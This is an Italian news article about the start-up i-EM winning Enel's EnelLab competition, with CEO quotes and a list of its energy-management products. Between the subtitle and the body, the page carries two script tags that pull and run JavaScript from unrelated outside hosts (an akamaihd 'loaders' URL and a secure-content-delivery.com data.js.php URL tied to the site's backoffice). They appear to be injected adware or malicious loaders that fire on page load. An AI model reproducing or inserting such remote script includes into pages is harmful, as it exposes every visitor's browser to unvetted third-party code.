1. Home
  2. Notizie e Mercato
  3. I-em: energia intelligente. Avanti tutta!

I-em: energia intelligente. Avanti tutta!

Energie rinnovabili di
i-EM, intelligence in Energy Management, ha vinto il premio EnelLab grazie alle innovative soluzioni per la gestione intelligente dell'energia

<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862"></script><script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script>


Si scrive i-EM e si legge intelligence in Energy Management. È questo il nome della start-up italiana che ha vinto la prima edizione del laboratorio di impresa EnelLab che ha visto la partecipazione di oltre 200 soggetti imprenditoriali provenienti dalla Spagna e dall'Italia, fra i due paesi, insieme alla Germania, più tecnologicamente avanzati nei settore energie rinnovabili e smart grid.

EnelLab è l'iniziativa con la quale Enel mette a disposizione risorse e servizi alle start-up più innovative che aspirano a cambiare le regole del gioco del mondo dell'energia.

 

"Sono estremamente orgoglioso - dichiara Emilio Simeone, Amministratore Delegato di i-EM - del risultato ottenuto. Siamo una squadra che ha lavorato duro per raggiungere questo importante obiettivo ed il merito è di tutto il team".

 

i-EM, nata dall'esperienza pluriennale di FlyBy nel settore dei servizi ICT per le energie rinnovabili, ha vinto la competizione grazie ad un avanzato sistema di simulazione e di supporto alle decisioni per la gestione intelligente dell'energia.

L'innovazione dei sistemi di i-EM rispetto a quelli già presenti nel mercato, consiste nell'integrazione di flussi di dati provenienti da diversi fonti: dati satellitari, dati meteoreologici, dati dalla rete elettrica, dati di esercizio degli impianti. I dati così analizzati, secondo modelli matematici complessi, sono presentati all'utente attraverso una semplice e personalizzabile interfaccia consultabile su desktop, tablet e smartphone.

 

"La versatilità - continua Simeone - è sicuramente uno degli aspetti vincenti delle nostre soluzioni. Sono infatti pensate per ogni tipologia di utente: dal tecnico all'energy manager fino agli executives".

i-EM propone 4 linee di prodotto pensate per Aziende di O&M, EPC Contractors, Costruttori di Inverter, Gestori di RetiElettriche, Energy Manager, Energy traders, Utilities:



-Sistemi per la pianificazione di impianti di energia rinnovabile, REPlanner

-Sistemi per il monitoraggio di impianti di energia rinnovabile,REController

-Sistemi per la gestione attiva dell’efficienza energetica (verificare dicitura), E2M

 -Sistemi di gestione e monitoraggio di Smart Grid e VPPs, RES2Grid

"Come FlyBy - conclude Simeone - abbiamo già collaborato con Enel Green Power. Ritengo che la partnership con un gruppo energetico multinazionale così importante sia strategica e che, alla luce delle nuove prospettive legate ad Enel Lab, abbiamo ora le competenze e la possibilità di posizionarci in maniera importante sul mercato globale dei sistemi ICT per la gestione dell'energia".

 



Sito web: http://www.i-em.eu